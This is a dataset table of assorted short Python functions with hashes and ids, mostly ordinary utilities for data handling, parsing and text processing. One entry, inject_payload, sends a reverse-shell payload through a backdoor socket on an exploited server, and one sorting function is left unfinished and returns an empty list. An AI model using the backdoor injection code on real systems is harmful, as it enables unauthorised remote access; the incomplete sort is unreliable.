content
stringlengths
35
416k
sha1
stringlengths
40
40
id
int64
0
710k
def reduce_behave_data(df): """Trims df and changes dtypes to reduce pkl size""" df = df[ ["type_", "class_", "response", "correct", "rt", "reward", "stim_id", "subj"] ] for col in ["correct", "reward"]: df[col] = df[col].astype(bool) for col in ["type_", "class_", "response", "subj"]: df[col] = df[col].astype("category") return df
1100f792040bb9f943e6b9c7b4159a3a7f617cd2
696,972
import re def find_serial_number(show_ver): """ Find the serial number in show version output. Example: Processor board ID FTX1512038X """ match = re.search(r"Processor board ID (.*)", show_ver) if match: return match.group(1) return ''
37b678555caaa58c08c3629c5a1fd85bd024a862
696,973
def unique_cols(x): """ Checks the columns for a taxid entry and only returns unique indices This is meant to fix the problem of some taxids having multiple entries for the same taxonomic rank. Example: Alouatta palliata mexicana (Howler monkey) taxid = 182248 superkingdom phylum order genus species class family class 2759 7711 9443 9499 30589 40674 378855 1338369 This function would return indices for columns to use with 'iloc' in order to get: superkingdom phylum order genus species class family 2759 7711 9443 9499 30589 40674 378855 :param x: :return: """ col_index = [] cols = [] for i, c in enumerate(x.columns): if c not in cols: cols.append(c) col_index.append(i) return col_index
6d2af3bf4257f57b265c0b573ef1b5ad2d8a40e6
696,974
def get_net_adjusted_income(gross_income, salary_sacrifice): """Returns net adjusted income, i.e. gross income net of salary sacrifice. Should be fed with an absolute salary sacrifice.""" net_adjusted_income = gross_income - salary_sacrifice return net_adjusted_income
e0acdd3d0f926d5268961729239b38598dc8be05
696,975
def byte_str(object): """bytes to str, str to bytes""" if isinstance(object, str): return object.encode(encoding="utf-8") elif isinstance(object, bytes): return bytes.decode(object) else: print(type(object))
f84ec4e9b7932f397761296a5ef37ccd4b5e5d05
696,976
import random import string def random_name(N=10): """ String of N random characters Args: N: int: the number of random characters Returns: s: string: the random string with N characters """ return "".join( random.choice(string.ascii_lowercase + string.digits) for _ in range(N) )
9f63408193f4636135ebf4689eaf81be35fa2b71
696,977
from typing import Tuple def intersect(input_blocks: Tuple[int, int]) -> int: """Intersect tuple of input blocks to return air or stone Arguments: input_blocks {Tuple[int, int]} -- Two input blocks Returns: int -- Intersected block """ if input_blocks[0] == 0 or input_blocks[1] == 0: return 0 return 4
f1a900d3421244b2754b2ec60fe527568fa76739
696,978
def calculate_driver_ability(calculated_data): """Calculates the relative driver ability for a team using driver zscores. calculated_data is the calculated data for the team being calculated.""" agility_weight = 0.65 speed_weight = 0.35 driver_ability = calculated_data['agilityZScore'] * agility_weight + \ calculated_data['speedZScore'] * speed_weight return driver_ability
5ae090342635b85514b1bdda0e49ed2d507589fb
696,979
import struct def decode_string(binary_input): """Decode a binary uon string. Length of the string is encoded on the two first bytes, the string value is utf-8 encoded on the rest. Args: binary_input (bytes): a binary uon string Returns: tuple: uon string with the decoded value, and the rest of the binary """ length_encoded = binary_input[0:2] length = struct.unpack("<H", length_encoded)[0] end_string_offset = length + 2 encoded_value = binary_input[2:end_string_offset] rest = binary_input[end_string_offset:] unpack_format = f"{length}s" value = struct.unpack(unpack_format, encoded_value)[0] return value.decode("utf-8"), rest
96a7857352d0530bf5ed896be1203e82b8540f5b
696,980
def url_add(**kwargs): """ Displays a box containing an "add pattern" entry box and its form """ return kwargs
7b515d82c20a5372eece459de26de66a38cbb15d
696,981
def handle_es_request_error(error): """ handle all sorts of client errors (ClientError is a custom exception that is raised whenever the search fails due to client errors) """ return str(error), 400
b45686dcda1c11acd10283801e5dd03021fb71c1
696,982
def get_single_key_value_pair(d): """ Get the key and value of a length one dictionary. Parameters ---------- d : dict Single element dictionary to split into key and value. Returns ------- tuple of length 2, containing the key and value Examples -------- >>> d = dict(key='value') >>> get_single_key_value_pair(d) ('key', 'value') """ assert isinstance(d, dict), f'{d}' assert len(d) == 1, f'{d}' return list(d.items())[0]
c4fb7a05aa74a69ebb55a867e23298748a919738
696,983
def _fconvert(value): """ Convert one tile from a number to a pentomino character """ return {523: 'U', 39: 'N', 15: 'F', 135: 'W', 23: 'P', 267: 'L', 139: 'Z', 77: 'T', 85: 'Y', 43: 'V', 33033: 'I', 29: 'X'}[value]
73900c0f76fd8ab50d92c9db049547c83ab1c5d0
696,984
def is_bad_ker(radar): """Kerava radar data rejection conditions""" return False
d71526b11f1e48094a850a4ec400d35c48309255
696,985
def load_story_ids(filename): """ Load a file and read it line-by-line Parameters: ----------- filename: string path to the file to load Returns: -------- raw: list of sentences """ f = open(filename, "r") story_ids = [line[:-1] for line in f] f.close() return story_ids
a97580467da036b687fa1de4179159c113cf1d1b
696,987
import os def checkFileExists(filePathName): """ check if file exists Parameters: filePathName: Path and name of the file to check when the file was not found return: original filePathName or updated filePathName with new path "" when file was not found """ fname = os.path.basename(filePathName) if os.path.isfile(filePathName): return filePathName else: return ""
52ce7c67cae443ae36f7cc0ff8560d212c3b3054
696,988
import os def get_base_filename(filename): """ Strips out preceding path and file extension from a filename. :param filename: Filename, possibly including path and extension. :return: Filename without path and without extension. """ base_file = os.path.basename(filename) return os.path.splitext(base_file)[0]
0b2ae0f6482979f530568b631826fcd0da107eb0
696,989
import six def make_model_tuple(model): """ Takes a model or a string of the form "app_label.ModelName" and returns a corresponding ("app_label", "modelname") tuple. If a tuple is passed in, it's assumed to be a valid model tuple already and returned unchanged. """ if isinstance(model, tuple): model_tuple = model elif isinstance(model, six.string_types): app_label, model_name = model.split(".") model_tuple = app_label, model_name.lower() else: model_tuple = model._meta.app_label, model._meta.model_name assert len(model_tuple) == 2, "Invalid model representation: %s" % model return model_tuple
250586856243d6d019a45f0dc3f1b2a5eedf5dfb
696,990
import socket def is_live_server(): """예를 들어 hostname이 '-live'로 끝나면 live server로 인식""" return socket.gethostname().endswith('-live')
629f6bd56d53bb5e3b20169ca05433f0cc095104
696,992
import re def format_label_name(name): """ Format string label name to remove negative label if it is EverythingElse """ m = re.match("\[([A-Za-z0-9]+)\]Vs\[EverythingElse\]", name) if m is None: return name else: return m.group(1)
7fd5769314da849810b81a23ab32fe099ed600ae
696,993
from pathlib import Path def set_outputfile(file_pattern, target_directory, target_out_directory=None, start_year=None, end_year=None): """ Set output filename based on variables. Parameters ---------- file_pattern : TYPE DESCRIPTION. target_directory : TYPE DESCRIPTION. target_out_directory : TYPE, optional DESCRIPTION. The default is None. start_year : TYPE, optional DESCRIPTION. The default is None. end_year : TYPE, optional DESCRIPTION. The default is None. Returns ------- outputfile : TYPE DESCRIPTION. """ if not target_out_directory: target_out_directory = Path(target_directory.parent, 'copernicus-processed-data') elif 'str' in str(type(target_out_directory)): target_out_directory = Path(target_out_directory) if not target_out_directory.exists(): target_out_directory.mkdir(parents=True) if start_year == end_year or not end_year: outputfile = target_out_directory / f'{file_pattern}-{start_year}.nc' else: outputfile = target_out_directory / \ f'{file_pattern}-{start_year}_{end_year}.nc' return outputfile
d3f52e95a95eb09121be7e60b5e8fc24aa356e76
696,994
def readFile(fileName): """Read a file, returning its contents as a single string. Args: fileName (str): The name of the file to be read. Returns: str: The contents of the file. """ fileContents = "" with open(fileName) as inputFile: fileContents = inputFile.read() return fileContents
7292b38ac46fb60a733bffeddb9c7ee8fa600e03
696,995
def regenerate_node(arbor, node): """ Regenerate the TreeNode using the provided arbor. This is to be used when the original arbor associated with the TreeNode no longer exists. """ if node.is_root: return arbor[node._arbor_index] root_node = node.root return root_node.get_node("forest", node.tree_id)
6c900050ed03f8dc175a7b584cba04d9519cb232
696,996
import torch def label2one_hot_torch(labels, C=14): """ Converts an integer label torch.autograd.Variable to a one-hot Variable. Args: labels(tensor) : segmentation label C (integer) : number of classes in labels Returns: target (tensor) : one-hot vector of the input label Shape: labels: (B, 1, H, W) target: (B, N, H, W) """ b,_, h, w = labels.shape one_hot = torch.zeros(b, C, h, w, dtype=torch.long).to(labels) target = one_hot.scatter_(1, labels.type(torch.long).data, 1) #require long type return target.type(torch.float32)
f44170bc7c8a37ca1ccb9afb104c9786e11f8396
696,997
def get_shape_columns(shape): """Return the number of columns for the shape.""" try: return shape[1] except (IndexError, TypeError): return 0
48f5fb00248e7c51fb2c8e26e705b92d57f20d46
696,998
def formacion(soup, home_or_away): """ Given a ficha soup, it will return either the formacion table of the home team, or the away one. Args: soup (BeautifulSoup): Soup of the current match home_or_away (int): Either a 1(home team) or 0(away team) """ return soup.find('table', attrs={ 'id': f'formacion{home_or_away}' })
9213eb269bbca0b5fd86ed9e5b5e43eef871dd4d
696,999
def _observables_plots(): """ Metadata for observables plots. """ def id_parts_plots(obs): return [(obs, species, dict(label=label)) for species, label in [ ('pion', '$\pi$'), ('kaon', '$K$'), ('proton', '$p$') ]] return [ dict( title='Yields', ylabel=( r'$dN_\mathrm{ch}/d\eta,\ dN/dy,\ dE_T/d\eta\ [\mathrm{GeV}]$' ), ylim=(1, 1e5), yscale='log', height_ratio=1.5, subplots=[ ('dNch_deta', None, dict(label=r'$N_\mathrm{ch}$', scale=25)), ('dET_deta', None, dict(label=r'$E_T$', scale=5)), *id_parts_plots('dN_dy') ] ), dict( title='Mean $p_T$', ylabel=r'$\langle p_T \rangle$ [GeV]', ylim=(0, 1.7), subplots=id_parts_plots('mean_pT') ), dict( title='Mean $p_T$ fluctuations', ylabel=r'$\delta p_T/\langle p_T \rangle$', ylim=(0, .04), subplots=[('pT_fluct', None, dict())] ), dict( title='Flow cumulants', ylabel=r'$v_n\{2\}$', ylim=(0, .12), subplots=[ ('vnk', (n, 2), dict(label='$v_{}$'.format(n))) for n in [2, 3, 4] ] ) ]
b2c5d89eb7d70e140afbdf7efd191372c4e47ac6
697,000
def natural_death(params, substep, state_history, prev_state): """ Remove agents which are old or hungry enough. """ agents = prev_state['agents'] maximum_age = params['agent_lifespan'] agents_to_remove = [] for agent_label, agent_properties in agents.items(): to_remove = agent_properties['age'] > maximum_age to_remove |= (agent_properties['food'] <= 0) if to_remove: agents_to_remove.append(agent_label) return {'remove_agents': agents_to_remove}
2b85c4161d20f8904485a80b847b7b6bf669dbc1
697,001
def _2D_ticks(x_num_ticks, y_num_ticks, env_config, type_): """ Generates the tick labels for the heatmap on a 2D-state environment Parameters ---------- num_ticks : int The total number of ticks along the axis env_config : dict The environment configuration file as a dict type_ : str The type of plot to get the ticks of the heatmap for, one of 'state', 'action' Returns ------- 2-tuple of func The function to generate the x tick labels and the function to generate the y tick labels """ if type_ == "state": ymin, xmin = env_config["state_low"] ymax, xmax = env_config["state_high"] else: ymin, xmin = 0.0, env_config["action_low"][0] ymax, xmax = 0.0, env_config["action_high"][0] def xtick(x, pos): if pos == 0: return "{:.2f}".format(xmin) elif pos == x_num_ticks - 1: return "{:.2f}".format(xmax) elif pos == x_num_ticks - (x_num_ticks // 2): return "{:.1f}".format((xmax + xmin) / 2) else: return "" def ytick(x, pos): if pos == 0: return "{:.2f}".format(ymin) elif pos == y_num_ticks - 1: return "{:.2f}".format(ymax) elif pos == y_num_ticks - (y_num_ticks // 2): return "{:.1f}".format((ymax + ymin) / 2) else: return "" return xtick, ytick
e0b93f06c0d8161d3464ac396b592baa1dcd965f
697,002
def _splitDate(nymd): """ Split nymd into year, month, date tuple. """ nymd = int(nymd) yy = nymd/10000 mm = (nymd - yy*10000)/100 dd = nymd - (10000*yy + 100*mm ) return (yy,mm,dd)
0dca81925f6ea4e965962cd436444c3b78e05467
697,003
def authorized_cols(): """Initialize authorized cols.""" return ['one', 'two']
df580b201b94400530f74755bb55204fd32d8101
697,004
def get_values_greater_than(values, A): # O(N) """ From a ascendingly sorted array of values, get values > A >>> get_values_greater_than([1, 4, 9, 16, 25, 36, 49, 64, 81, 100, 121], 64) [121, 100, 81, 64] >>> get_values_greater_than([1], 1) [1] """ num_values = len(values) # O(1) array = [] # O(1) for i in range(num_values - 1, -1, -1): # O(N) value = values[i] # O(1) if value >= A: # O(1) array.append(value) # O(1) else: # O(1) return array # O(1) return array # O(1)
a1599139be2823cdf05de88ef1cfdc0dd6eceb4c
697,005
import numpy def weight(x, J, delta, sigma, z): """ Generate a single block of connectivity matrix. """ return numpy.exp(-(x - x.T)**2/(2 * sigma**2)) * (J + delta * z)
ada874bcb3410811d576f02ce2b365d48d8e2146
697,006
import re def sort_twisted37(arr): """ Sorts the array in ascending order, but where there is a 3 a 7 is placed and vice versa Will first sort the array the usual way, creating a sorted copy of the input array Loops through each number in the sorted array, checking the number is 3 or contains a 3 :param arr: The array of numbers to sort :return: The sorted array :rtype: list """ # first sort the array the normal way sorted_arr = sorted(arr) three, seven = 0, 0 for num in sorted_arr: if re.match(r'^3$|^[1-9]+3$', str(num)): three = num # find its index sorted_arr.index(num) elif num == 7 or str(num).__contains__(str(7)): seven = num return []
d71b5d748a7e10f76b11d1946939d0f48063b3a5
697,007
def by_command(extractor, prefix=('/',), separator=' ', pass_args=False): """ :param extractor: a function that takes one argument (the message) and returns a portion of message to be interpreted. To extract the text of a chat message, use ``lambda msg: msg['text']``. :param prefix: a list of special characters expected to indicate the head of a command. :param separator: a command may be followed by arguments separated by ``separator``. :type pass_args: bool :param pass_args: If ``True``, arguments following a command will be passed to the handler function. :return: a key function that interprets a specific part of a message and returns the embedded command, optionally followed by arguments. If the text is not preceded by any of the specified ``prefix``, it returns a 1-tuple ``(None,)`` as the key. This is to distinguish with the special ``None`` key in routing table. """ if not isinstance(prefix, (tuple, list)): prefix = (prefix,) def f(msg): text = extractor(msg) for px in prefix: if text.startswith(px): chunks = text[len(px):].split(separator) return chunks[0], (chunks[1:],) if pass_args else () return (None,), # to distinguish with `None` return f
db76383bcad80be4381bb26fb65f4594576248b8
697,008
def get_filename_from_path(file_path, delimiter="/"): """ Get filename from file path (filename.txt -> filename) """ filename = file_path.split(delimiter)[-1] return filename.split(".")[0]
b079ce15dd44e8db314fdd5cb354e3bf2cab8471
697,009
import time def loop(tasks=1, breaks=0, *args, **kwargs): """ Loop a function X amount of times :param tasks: Amount of times to loop the function :param breaks: The amount of time to wait between each loop. """ def wrapper(original_func, *args, **kwargs): for i in range(tasks): original_func(*args, **kwargs) time.sleep(breaks) return wrapper
6d682d7d980c7f17ad2ccc45c7a509b52cf23065
697,010
def add(first, second): """Return the sum of the two numbers.""" return first + second
2b9b604d4958579774e6c96eab2bea63506468df
697,011
import os import csv import gc def read_RSEM_counts_files(geneFilePath,isoformFilePath): """ read the RSEM counts files into a matrix """ if not os.path.exists(geneFilePath): raise Exception("Cannot find gene file\n%s"%(geneFilePath)) if not os.path.exists(isoformFilePath): raise Exception("Cannot find isoform file\n%s"%(isoformFilePath)) ## load the gene counts fid1 = open(geneFilePath,'rU') reader1 = csv.reader(fid1,delimiter="\t") header1 = next(reader1) results1 = {} check = 0 gc.disable() for linja in reader1: check += 1 results1[linja[0]] = {'transcript':linja[1],'length':float(linja[2]),'eff_length':float(linja[3]),\ 'exp_count':int(round(float(linja[4]))),'TPM':float(linja[5]),'FPKM':float(linja[6])} fid1.close() if check != len(results1.keys()): raise Exception("Rows in gene count file are not first columns unique") ## load the isoform results fid2 = open(isoformFilePath,'rU') reader2 = csv.reader(fid2,delimiter="\t") header2 = next(reader2) results2 = {} check = 0 for linja in reader2: check += 1 results2[linja[0]] = {'gene':linja[1],'length':float(linja[2]),'eff_length':float(linja[3]),\ 'exp_count':float(linja[4]),'TPM':float(linja[5]),'FPKM':float(linja[6])} fid1.close() if check != len(results2.keys()): raise Exception("Rows in gene count file are not first columns unique") fid2.close() gc.enable() return results1, results2
8c692b0c9089ae1eb95fbc006b97d12e1b8fefb5
697,012
import os def list_dir_abspath(path): """ Return a list absolute file paths. see mkdir_p os.listdir. """ return map(lambda f: os.path.join(path, f), os.listdir(path))
55fc543efd4bbad63c66c5c5537a4b640d5fff56
697,013
import socket import re def inject_payload(conn: socket.socket, payload) -> bool: """ Inject a payload into the backdoor connection. :param conn: socket object connected to backdoor :param payload: payload to inject (usually a reverse shell) :return: boolean indicating success or failure """ print('Injecting payload via backdoor.') # verify that we have a shell and grab the user ID sent_bytes = conn.send('id\n'.encode()) response = conn.recv(1024) uid_data = response.decode().strip() if re.search(r'^uid=', uid_data): uid = uid_data.split('(')[1].split(')')[0] print('Got shell as user {}!'.format(uid)) # send a simple reverse shell from the exploited server to the attacking host print('Injecting and running payload.') sent_bytes = conn.send('nohup {} >/dev/null 2>&1\n'.format(payload).encode()) return True else: print(uid_data) return False
907df512f344288d076c1d1fed95aecfc016d413
697,014
def nraphson(f, df, x0, tol=1e-3, maxit=20000): """ Newto Raphson Equation Solving Compute Equation roots given its equation and derivate Xn = Xn-1 - f(x)/f'(x) :param f: Function f(x) handler :param df: Derivate of f'(x) handler :param x0: Inital guess :param maxit: Max number of iterations :param tol: Tolerance :return: [ x, it, error ] """ x = 0 x_ = x0 it = 0 error = 0 while it < maxit: it += 1 x = x_ - f(x_) / df(x_) error = abs(x - x_) / abs(x_) if error < tol: break x_ = x # print "it =", it # print "error = ", error return x, it, error
6256ba5e51f94ea1a35fd4e4957520348ae69d6f
697,015
def doublecomplement(i,j): """ returns the two element of (1,2,3,4) not in the input """ list=[1,2,3,4] list.remove(i) list.remove(j) return list
b4bb329b320b2b8c3e7b7648914636f96394b6d7
697,016
def yr_label(yr_range): """Create label of start and end years for aospy data I/O.""" assert yr_range is not None, "yr_range is None" if yr_range[0] == yr_range[1]: return '{:04d}'.format(yr_range[0]) else: return '{:04d}-{:04d}'.format(*yr_range)
c453d759a23dce169593afc64846e9560d9f1cb5
697,017
def setup_with_context_manager(testcase, cm): """Use a contextmanager to setUp a test case. If you have a context manager you like:: with ctxmgr(a, b, c) as v: # do something with v and you want to have that effect for a test case, call this function from your setUp, and it will start the context manager for your test, and end it when the test is done:: def setUp(self): self.v = setup_with_context_manager(self, ctxmgr(a, b, c)) def test_foo(self): # do something with self.v """ val = cm.__enter__() testcase.addCleanup(cm.__exit__, None, None, None) return val
e2a67d9a9600203223a220eb0a5e40c96ae6166d
697,018
def zip_with(fn, xs, ys): """ Standard python zip with function. User can define custom zipping function instead of the standard tuple. """ return [fn(a, b) for (a, b) in zip(xs, ys)]
7ac086d61198262b8b355e6eacb82be364b1f6a6
697,019
import os def simple_path(input_path, use_basename=True, max_len=50): """ Return the last part of long paths """ if use_basename: return os.path.basename(input_path) if len(input_path) > max_len: return f"[Trunked]..{input_path[len(input_path)-max_len:]}" return input_path
15ad6cb5a5b07bb7b5db9b2d1f6c62c45bc43517
697,020
def catch_bare_exception_sanitize_array(e): """See pandas-dev/pandas#35744""" return isinstance(e, Exception) and 'Data must be 1-dimensional' in str(e)
c5a327ba0ba22cbbe877206635c3a089daa6f5a1
697,021
from typing import Tuple def hosting_period_get(month: int) -> Tuple[int, int]: """Determine the Hosting period for the current month.""" # In February only, Hosts begin on the 1st and 15th if month == 2: return (1, 15) # For all other months, Hosts begin on the 1st and 16th return (1, 16)
77d7bc84f969b8be0f4e81ddb26d96e0d7569561
697,022
def exclude_sims_by_regex(sims, regex): """Removes sims by using a regular expression. DESCRIPTION: Returns all sims that do NOT match the regular expression. ARGS: sims (iterable of strings): An iterable of strings contating candidate sim files regex (_sre.SRE_Pattern): The regular expression to use. This should be compiled e.g., re.compile(r'.+sim') which will find all sim files. RETURNS: A list of strings that do not match the regular expression. """ output = [] for sim in sims: if not regex.search(sim): output.append(sim) return output
e8ca8399430e7d0017e1fb621b38103eac678089
697,023
import pytz def http_date(dt): """ Convert datetime object into http date according to RFC 1123. :param datetime dt: datetime object to convert :return: dt as a string according to RFC 1123 format :rtype: str """ return dt.astimezone(pytz.utc).strftime('%a, %d %b %Y %H:%M:%S GMT')
20db2de2969216d201bc65227fb4b54e5c71a4c5
697,024
def get_completer_delims(): # real signature unknown; restored from __doc__ """ get_completer_delims() -> string get the word delimiters for completion """ return ""
4cef2f0f98efaa4a624065c9ac60c96534b576f9
697,025
def build_telegram(name: str, message: str, title="Dr") -> str: """Generate a properly formatted telegram message body. Args: name: The recipient of this telegram message: The message to send this user title: The recipient's title Returns: A properly formatted string for a telegram message """ STOP = " -STOP- " punctuation = [".", ",", "!"] for symbol in punctuation: message = message.replace(symbol, STOP) greeting = f"ATTN {title} {name}{STOP} " telegram = f"{greeting}{message}".upper() return telegram
7d3af3b3a61a7f2f141be6f50e10199e340245d2
697,027
def train2rect(ratios, imagew, imageh): """ Takes in data used during training and transforms it into format matching the format outputted by darknet's valid function. """ xratio, yratio, wratio, hratio = ratios xmin = xratio*imagew - wratio*imagew/2 ymin = yratio*imageh - hratio*imageh/2 xmax = xratio*imagew + wratio*imagew/2 ymax = yratio*imageh + hratio*imageh/2 return (xmin, ymin, xmax, ymax)
7675df2c314088d6363bf40dff1aac04b22c61bf
697,028
def is_key_complete(key): """Returns true if the key is complete. Complete keys are marked with a blank symbol at the end of the string. A complete key corresponds to a full word, incomplete keys cannot be mapped to word IDs. Args: key (string): The key Returns: bool. Return true if the last character in ``key`` is blank. """ return key and key[-1] == ' '
ecf905f973fd14f1be21b1490ad8a18988397ab9
697,029
def acknowledgements(name, tag): """Returns acknowledgements for space weather dataset Parameters ---------- name : string Name of space weather index, eg, dst, f107, kp tag : string Tag of the space waether index """ swpc = ''.join(['Prepared by the U.S. Dept. of Commerce, NOAA, Space ', 'Weather Prediction Center']) ackn = {'kp': {'': 'Provided by GFZ German Research Centre for Geosciences', 'forecast': swpc, 'recent': swpc}} return ackn[name][tag]
f490fe6cd4f85baad6a097b71410bb014ec0394e
697,030
def rectangleOverlap(BLx1, BLy1, TRx1, TRy1, BLx2, BLy2, TRx2, TRy2): """ returns true if two rectangles overlap BL: Bottom left TR: top right "1" rectangle 1 "2" rectangle 2 """ return not (TRx1 < BLx2 or BLx1 > TRx2 or TRy1 < BLy2 or BLy1> TRy2)
96ea5aab6738f72587c5dd9db45598e291e68338
697,031
import itertools def build_vocab(tokenized_src_trgs_pairs, opt): """Construct a vocabulary from tokenized lines.""" vocab = {} for src_tokens, trgs_tokens in tokenized_src_trgs_pairs: tokens = src_tokens + list(itertools.chain(*trgs_tokens)) for token in tokens: if token not in vocab: vocab[token] = 1 else: vocab[token] += 1 # Discard start, end, pad and unk tokens if already present if '<s>' in vocab: del vocab['<s>'] if '<pad>' in vocab: del vocab['<pad>'] if '</s>' in vocab: del vocab['</s>'] if '<unk>' in vocab: del vocab['<unk>'] word2id = { '<pad>': 0, '<s>': 1, '</s>': 2, '<unk>': 3, } id2word = { 0: '<pad>', 1: '<s>', 2: '</s>', 3: '<unk>', } sorted_word2id = sorted( vocab.items(), key=lambda x: x[1], reverse=True ) sorted_words = [x[0] for x in sorted_word2id] for ind, word in enumerate(sorted_words): word2id[word] = ind + 4 for ind, word in enumerate(sorted_words): id2word[ind + 4] = word return word2id, id2word, vocab
67abde6882f9ef9b6f20a06447a2dae2ec4b6ad8
697,032
from typing import Tuple def _identify_missing_columns( schema_field_names: Tuple[str, ...], column_names: Tuple[str, ...], ) -> Tuple[bool, ...]: """Returns boolean mask of schema field names not in column names.""" return tuple(field_name not in column_names for field_name in schema_field_names)
c6ca296e5dd4d2271b06e5e3a21a3a8d716d76cd
697,033
import re def get_patient_uuid(element): """ Extracts the UUID of a patient from an entry's "content" node. >>> element = etree.XML('''<entry> ... <content type="application/vnd.atomfeed+xml"> ... <![CDATA[/openmrs/ws/rest/v1/patient/e8aa08f6-86cd-42f9-8924-1b3ea021aeb4?v=full]]> ... </content> ... </entry>''') >>> get_patient_uuid(element) 'e8aa08f6-86cd-42f9-8924-1b3ea021aeb4' """ # "./*[local-name()='content']" ignores namespaces and matches all # child nodes with tag name "content". This lets us traverse the # feed regardless of whether the Atom namespace is explicitly given. content = element.xpath("./*[local-name()='content']") pattern = re.compile(r'/patient/([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b') if content and len(content) == 1: cdata = content[0].text matches = pattern.search(cdata) if matches: return matches.group(1) raise ValueError('Patient UUID not found')
0d80313b6c7305ec72c96e29269d15718e4105da
697,034
def split_member_name(name_member): """split_member_name Quebra o nome do usuário a partir do "#" retornando somente o nome """ name_of_author_return, hashtag_atrelada = name_member.split('#') hashtag_atrelada = hashtag_atrelada return name_of_author_return
a492ef055b4bf68749a9d0a217d8cc21de9eb8ac
697,036
import subprocess def execute_program(args): """Executes a process and waits for it to complete. @param args: is passed into subprocess.Popen(). @returns a tuple of the process output (returncode, output) """ proc = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) output, _ = proc.communicate() errcode = proc.returncode return (errcode, output)
dbf64fa8ae4d0250ab9082cc822690756a62a4e2
697,037
def read_teachers(connection): """ read teacher to extract results. :param connection: :return: """ teachers_list = [] sql_select = """SELECT DISTINCT(LOWER(XMPY)) FROM teacher""" cursor = connection.cursor() cursor.execute(sql_select) teachers = cursor.fetchall() for teacher in teachers: teachers_list.append(teacher[0]) return teachers_list
3b37e454f779da2f186a96a4cdf1d1d95164037a
697,038
import argparse def get_args(): """ Supports the command-line arguments listed below. """ parser = argparse.ArgumentParser( description='vfs_stress Server runner') parser.add_argument('cluster', type=str, help='File server name or IP') parser.add_argument('-c', '--clients', type=str, nargs='+', help="Space separated list of clients") parser.add_argument('-e', '--export', type=str, default="/", help="NFS export name") parser.add_argument('--start_vip', type=str, help="Start VIP address range") parser.add_argument('--end_vip', type=str, help="End VIP address range") parser.add_argument('--tenants', action="store_true", help="Enable MultiTenancy") parser.add_argument('-m', '--mtype', type=str, default='nfs3', choices=['nfs3', 'nfs4', 'nfs4.1', 'smb1', 'smb2', 'smb3'], help='Mount type') parser.add_argument('-l', '--locking', type=str, help='Locking Type', choices=['native', 'application', 'off'], default="native") args = parser.parse_args() return args
7af2c93aaa51d83d15d6b24424ef4d4e59083db0
697,039
from typing import List def csv_to_ints(school_description: str) -> List[int]: """Convert a comma separated string of integers to a list of integers. Returns ------- list[int] The list of integers from the string of comma separated values. >>> csv_to_ints('3,8,0') [3, 8, 0] """ return [int(integer) for integer in school_description.strip().split(',')]
199fe36a12ba5a95895110c0614761578bc786ca
697,040
def next_left(node): """ It returns the successor of node on this contour.This successor is either given by the leftmost child of node or by the thread of node. The function returns None if and only if node is on the highest level of its subtree. """ if node.children: # if node has a child return node.children[0] else: return node.thread
2ae9b2fec699f3a2da72901ad12f3a331c260044
697,041
import functools def chainingmethod(func): """ Declare a method is a chaining method which return self as returned value :param func: real func """ @functools.wraps(func) def chaining(self, *args, **kwg): func(self, *args, **kwg) return self return chaining
0e07d99bd196257483e50c6df119ad3c4f0128fd
697,042
def event_counter(json_, counter): """ takes a json and counts the number of events that happened during that game inputs ------ json__: events json counter: counter dictionary returns ----- counter: counter dict with counts """ for event in json_: event_type = event['type']['name'] counter[event_type] +=1 return counter
97a10f5f219cf383c419ba65764b4c9c3f47b5ec
697,043
import hashlib import base64 def calc_md5(string): """Generates base64-encoded MD5 hash of `string`.""" md5_hash = hashlib.md5() md5_hash.update(string) return base64.b64encode(md5_hash.digest()).strip(b"\n")
88135c92de48fe45888a4a4243cce13fcddceca8
697,044
def get_content(file): """Returns a string If file 'bruh' contains "Hellor" get_content("bruh") returns 'Hellor' """ file = open(file, "r") res = file.read() file.close() return res
ae86220be856e23ed143d77117a181054565eff0
697,045
import os import fnmatch def find_all_files(path, suffix="*.jpg"): """ find all the absolute path of files """ dirs = [path] files = [] while True: _dir = dirs.pop(0) subdirs = [os.path.join(_dir, subdir) for subdir in os.listdir(_dir)] for subdir in subdirs: if os.path.isfile(subdir): files.append(subdir) else: dirs.append(subdir) if len(dirs)==0: break return fnmatch.filter(files, suffix)
936b577953468f468f95e91a7c3ea2fc79450b18
697,046
def convert_to_float(frac_str): """ convert string of fraction (1/3) to float (0.3333) Parameters ---------- frac_str: string, string to be transloated into Returns ------- float value corresponding to the string of fraction """ try: return float(frac_str) except ValueError: num, denom = frac_str.split('/') try: leading, num = num.split(' ') whole = float(leading) except ValueError: whole = 0 frac = float(num) / float(denom) return whole - frac if whole < 0 else whole + frac
4f4e2ad0e5eeee7a8cc54b8b724031a48a48d747
697,047
import re def parse_fst_session_event(ev): """Parses FST session event that comes as a string, e.g. "<3>FST-EVENT-SESSION event_type=EVENT_FST_SESSION_STATE session_id=0 reason=REASON_STT" Returns a dictionary with parsed "type", "id", and "reason"; or None if not a FST event or can't be parsed""" event = {} if ev.find("FST-EVENT-SESSION") == -1: return None event['new_state'] = '' # The field always exists in the dictionary f = re.search("event_type=(\S+)", ev) if f is None: return None event['type'] = f.group(1) f = re.search("session_id=(\d+)", ev) if f is not None: event['id'] = f.group(1) f = re.search("old_state=(\S+)", ev) if f is not None: event['old_state'] = f.group(1) f = re.search("new_state=(\S+)", ev) if f is not None: event['new_state'] = f.group(1) f = re.search("reason=(\S+)", ev) if f is not None: event['reason'] = f.group(1) return event
e57cb2561e23ad89bb42559ae90c61c22d98e977
697,048
from typing import List def parse_input_file(file_path: str) -> List[List[int]]: """Parse a file with the following format: 21 22 24 12 7 21 23 Returns each line as integers in a nested list """ with open(file_path) as input_file: parsed_file = [list(map(int, line.split())) for line in input_file.readlines()] return parsed_file
f281dbcc7c9dc70eab491b1a334e0cb0cc3e45e4
697,049
def unlines(line): """Remove all newlines from a string.""" return line.translate(str.maketrans('\n', ' '))
0c2079d9694a8c48f8ddf0a87696ea89a72b1dc3
697,050
